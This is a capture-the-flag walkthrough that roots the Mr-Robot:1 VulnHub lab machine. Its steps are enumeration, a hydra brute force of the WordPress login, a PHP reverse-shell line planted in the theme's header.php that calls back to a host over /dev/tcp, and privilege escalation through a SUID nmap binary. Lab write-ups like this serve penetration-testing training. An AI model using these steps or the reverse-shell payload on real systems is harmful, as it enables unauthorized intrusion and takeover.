In this article we will try to gain root access to the machine Mr-Robot:1 . This machine is also a beginner level machine and we can download this machine from vulnhub.
First step is to find the IP address of the target machine and for that we used the command netdiscover -i wlan0
Now next step is to check for the hidden directories and files and for that we used the command : nmap -script http-enum.nse 192.168.43.87
There are many directories but /robots.txt and /wp-login.php looks useful for us.
So we start exploring the /robots.txt and we found 2 new files as we can see in the image
okay now we have downloaded both the files in our Machine and we tried to read the the content of both the files:
File fsocity.dic can be used for bruteforce purpose. Here one thing is clear that this website is using wordpress so without wasting our time we decided to find the credentials to login into the control panel of the website. So here we used a tool wpscan . To know more about this tool please read the article : https://www.haclabs.org/post/wordpress-penetration-testing
so we decided to enumerate user and we found a user elliot.
Now its time to perform our attack (to find the password). we used a tool hydra to perform our attack.
And yes we succeed in finding the correct login details.Now its time to login into the website.
Okay we are logged in successfully!
Now we decided to get a reverse-shell and for that we used php to execute it. we traverse to the directory Appearance→Editor→header.php and used the command : <? exec("/bin/bash -c 'bash -i>& /dev/tcp/192.168.43.249/443 0>&1'");
Now it's time to get the reverse shell but don't forget to listen on the port 443 by using the nc
Now we write something random in the URL to get an error and now we have reverse shell and to get a stable shell we have used python one-liner.
Now its time to find our key,for that we change our directory to : /home/robot and got a key.
after cracking this hash we get the password as : abcdefghijklmnopqrstuvwxyz.
Now we can use this password to get the shell of robot user by using the command : su robot
After getting the shell of user robot we get one more key as shown in the image
Now we check for SUID binaries by using the command: find / -perm /4000 -type f 2>/tmp/2
Yes,nmap can be used to get root access as
Done we are root now! by changing our directory to /root we can read our final key.
done!! this completes our challenge.
About the Author : Harshit Rastogi is a pentester ,bug hunter and a Technical Writer at HacLabs. Contatct him at : firstname.lastname@example.org
Linkedln profile : https://www.linkedin.com/in/harshit-rastogi-0955231a0